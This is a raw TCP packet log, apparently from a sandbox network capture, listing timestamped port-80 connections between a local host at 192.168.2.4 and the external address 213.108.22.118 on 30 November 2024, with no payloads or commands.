                                        Nov 30, 2024 22:36:25.836205006 CET4976180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:25.840183973 CET4976480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:25.956625938 CET8049761213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:25.956737995 CET4976180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:25.960444927 CET8049764213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:25.960537910 CET4976480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:25.970225096 CET4976480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:26.090411901 CET8049764213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:26.325414896 CET4976480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:26.445452929 CET8049764213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:26.445494890 CET8049764213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:26.445507050 CET8049764213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:27.404099941 CET8049764213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:27.450280905 CET4976480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:27.998064041 CET4977080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:27.998358011 CET4976480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.118422985 CET8049770213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.119004965 CET8049764213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.119143009 CET4976480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.119353056 CET4977080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.119353056 CET4977080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.120923042 CET4977180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.239334106 CET8049770213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.240806103 CET8049771213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.240902901 CET4977180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.241142035 CET4977180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.361023903 CET8049771213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.466022968 CET4977080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.586950064 CET8049770213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.586966991 CET8049770213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.591259956 CET4977180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:28.712424994 CET8049771213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.712436914 CET8049771213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:28.712579012 CET8049771213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:29.553709984 CET8049770213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:29.606596947 CET4977080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:29.778533936 CET8049771213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:29.789211988 CET8049770213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:29.825397015 CET4977180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:29.840938091 CET4977080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.031713009 CET8049771213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:30.075371027 CET4977180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.152024984 CET4977180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.152024984 CET4977080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.152420044 CET4977780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.272437096 CET8049771213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:30.272475958 CET8049777213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:30.272551060 CET4977180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.272600889 CET4977780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.272671938 CET8049770213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:30.272872925 CET4977780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.272897005 CET4977080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.392740011 CET8049777213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:30.622359037 CET4977780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:30.742433071 CET8049777213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:30.742468119 CET8049777213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:30.742476940 CET8049777213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:31.737581968 CET8049777213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:31.778491020 CET4977780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:31.982521057 CET8049777213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:32.028508902 CET4977780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:32.104475975 CET4978380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:32.224526882 CET8049783213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:32.224644899 CET4978380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:32.224869967 CET4978380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:32.344892025 CET8049783213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:32.575725079 CET4978380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:32.696118116 CET8049783213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:32.696130037 CET8049783213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:32.696142912 CET8049783213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:33.626511097 CET8049783213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:33.669230938 CET4978380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:33.883704901 CET8049783213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:33.934689045 CET4978380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.009852886 CET4977780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.017040968 CET4978380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.017323017 CET4978980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.137337923 CET8049789213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:34.137362003 CET8049783213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:34.137680054 CET4978980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.137684107 CET4978380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.137912035 CET4978980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.257944107 CET8049789213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:34.497508049 CET4978980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.618671894 CET8049789213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:34.618685961 CET8049789213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:34.618693113 CET8049789213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:34.795131922 CET4979080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.795335054 CET4978980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.915191889 CET8049790213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:34.915455103 CET4979080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.915800095 CET4979080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.932758093 CET4979180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:34.958154917 CET8049789213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.035753012 CET8049790213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.053932905 CET8049791213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.054039955 CET4979180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:35.054218054 CET4979180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:35.174109936 CET8049791213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.205509901 CET8049789213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.205570936 CET4978980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:35.262988091 CET4979080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:35.383002043 CET8049790213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.383054018 CET8049790213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.403801918 CET4979180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:35.523850918 CET8049791213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.523869038 CET8049791213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:35.523909092 CET8049791213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:36.339886904 CET8049790213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:36.387839079 CET4979080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.413021088 CET8049791213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:36.465990067 CET4979180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.573266983 CET8049790213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:36.622345924 CET4979080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.654452085 CET8049791213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:36.700512886 CET4979180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.775974035 CET4979180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.775990963 CET4979080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.776320934 CET4979780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.896640062 CET8049791213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:36.896747112 CET4979180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.897070885 CET8049790213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:36.897351027 CET4979080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.897453070 CET8049797213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:36.897530079 CET4979780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:36.897758961 CET4979780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:37.017649889 CET8049797213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:37.247416019 CET4979780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:37.367681026 CET8049797213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:37.367691994 CET8049797213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:37.367698908 CET8049797213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:38.291224957 CET8049797213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:38.340986013 CET4979780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:38.543819904 CET8049797213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:38.591012955 CET4979780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:38.666963100 CET4980380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:38.787033081 CET8049803213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:38.787149906 CET4980380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:38.787328959 CET4980380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:38.909372091 CET8049803213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:39.138134003 CET4980380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:39.258222103 CET8049803213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:39.258241892 CET8049803213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:39.258287907 CET8049803213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:40.160202026 CET8049803213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:40.200434923 CET4980380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.121246099 CET8049803213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:41.169162035 CET4980380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.245162964 CET4980380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.245367050 CET4980980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.366468906 CET8049809213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:41.366564989 CET4980980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.366610050 CET8049803213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:41.366662979 CET4980380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.366884947 CET4980980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.486850023 CET8049809213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:41.575963020 CET4980980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.576198101 CET4981080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.697300911 CET4981180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.719650030 CET8049810213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:41.719799042 CET4981080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.719985008 CET4981080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.737365007 CET8049809213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:41.954580069 CET8049811213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:41.954612970 CET8049810213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:41.954730034 CET4981180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:41.954997063 CET4981180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:42.074820995 CET8049811213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:42.075639009 CET4981080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:42.195784092 CET8049810213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:42.195800066 CET8049810213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:42.309997082 CET4981180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:42.421135902 CET8049809213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:42.421205044 CET4980980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:42.430023909 CET8049811213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:42.430033922 CET8049811213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:42.430138111 CET8049811213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:43.079910994 CET8049810213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:43.122356892 CET4981080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:43.316126108 CET8049811213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:43.356663942 CET4981180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.050710917 CET8049810213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.094005108 CET4981080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.198127031 CET8049797213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.198319912 CET4979780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.276808977 CET8049811213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.325453043 CET4981180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.402502060 CET4981080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.402760983 CET4981180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.402936935 CET4981780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.522906065 CET8049817213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.522918940 CET8049810213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.522984028 CET4981780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.523016930 CET4981080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.523240089 CET4981780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.523425102 CET8049811213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.523535967 CET4981180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.643160105 CET8049817213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.873140097 CET4981780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:44.993216038 CET8049817213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.993230104 CET8049817213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:44.993242025 CET8049817213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:45.843058109 CET8049817213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:45.888087034 CET4981780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:46.077480078 CET8049817213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:46.122407913 CET4981780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:46.202827930 CET4979780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:46.206553936 CET4982380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:46.326666117 CET8049823213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:46.328068972 CET4982380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:46.328255892 CET4982380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:46.448127031 CET8049823213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:46.684957981 CET4982380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:46.805087090 CET8049823213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:46.805133104 CET8049823213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:46.805144072 CET8049823213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:47.643871069 CET8049823213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:47.684911966 CET4982380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:47.877351046 CET8049823213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:47.919290066 CET4982380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:47.995807886 CET4982380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:47.996124983 CET4982980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:48.116555929 CET8049829213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:48.116698980 CET8049823213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:48.116786957 CET4982380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:48.116816998 CET4982980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:48.116966963 CET4982980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:48.236901999 CET8049829213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:48.466240883 CET4982980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:48.587711096 CET8049829213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:48.587727070 CET8049829213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:48.587737083 CET8049829213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.061299086 CET4983080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.061639071 CET4982980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.181324005 CET8049830213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.181406975 CET4983080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.181644917 CET4983080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.181879044 CET8049829213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.181943893 CET4982980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.187021971 CET4983180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.301655054 CET8049830213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.307132959 CET8049831213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.307212114 CET4983180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.307431936 CET4983180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.427397013 CET8049831213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.529067993 CET4983080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.649386883 CET8049830213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.649401903 CET8049830213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.653723001 CET4983180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:49.773778915 CET8049831213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.773837090 CET8049831213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:49.773845911 CET8049831213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:50.678457022 CET8049831213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:50.731760025 CET4983180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:50.834728003 CET8049830213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:50.852125883 CET8049817213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:50.856096029 CET4981780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:50.887990952 CET4983080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:50.922574997 CET8049831213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:50.966830969 CET4983180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.348020077 CET4983080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.348280907 CET4983180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.348726988 CET4983680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.468480110 CET8049830213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:51.468539953 CET4983080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.468612909 CET8049836213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:51.468673944 CET4983680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.468919992 CET8049831213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:51.468961954 CET4983180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.472342014 CET4983680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.592257023 CET8049836213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:51.825623035 CET4983680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:51.945768118 CET8049836213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:51.945787907 CET8049836213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:51.945801973 CET8049836213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:52.874078989 CET8049836213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:52.919259071 CET4983680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.128180981 CET8049836213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:53.184850931 CET4983680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.240993977 CET4981780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.246135950 CET4983680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.246376038 CET4984180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.367082119 CET8049841213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:53.367229939 CET8049836213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:53.367361069 CET4983680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.367383003 CET4984180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.367594957 CET4984180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.487456083 CET8049841213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:53.716379881 CET4984180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:53.836435080 CET8049841213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:53.836461067 CET8049841213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:53.836472034 CET8049841213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:54.756412029 CET8049841213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:54.809860945 CET4984180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:54.998539925 CET8049841213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:55.044270992 CET4984180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.125127077 CET4984180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.125544071 CET4984780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.245569944 CET8049841213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:55.245650053 CET4984180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.251864910 CET8049847213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:55.252032042 CET4984780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.252125978 CET4984780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.460980892 CET8049847213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:55.606905937 CET4984780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.727003098 CET8049847213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:55.727026939 CET8049847213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:55.727041006 CET8049847213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:55.841886997 CET4984780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.841993093 CET4984880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.961905956 CET8049848213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:55.962580919 CET4984880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.962694883 CET4984880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:55.963821888 CET4985080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:56.005592108 CET8049847213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.082709074 CET8049848213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.083740950 CET8049850213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.083939075 CET4985080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:56.083976030 CET4985080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:56.204114914 CET8049850213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.285739899 CET8049847213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.285834074 CET4984780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:56.310029984 CET4984880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:56.430006027 CET8049848213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.430077076 CET8049848213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.435024977 CET4985080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:56.555058002 CET8049850213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.555082083 CET8049850213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:56.555123091 CET8049850213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:57.382005930 CET8049848213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:57.425837994 CET4984880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.434160948 CET8049850213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:57.481761932 CET4985080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.636152029 CET8049848213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:57.669612885 CET8049850213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:57.684885025 CET4984880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.713356972 CET4985080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.797728062 CET4984880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.797878027 CET4985080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.798621893 CET4985580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.918030977 CET8049848213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:57.918114901 CET4984880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.918529987 CET8049850213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:57.918586969 CET4985080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.918595076 CET8049855213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:57.918668985 CET4985580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:57.918858051 CET4985580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:58.038774014 CET8049855213.108.22.118192.168.2.4
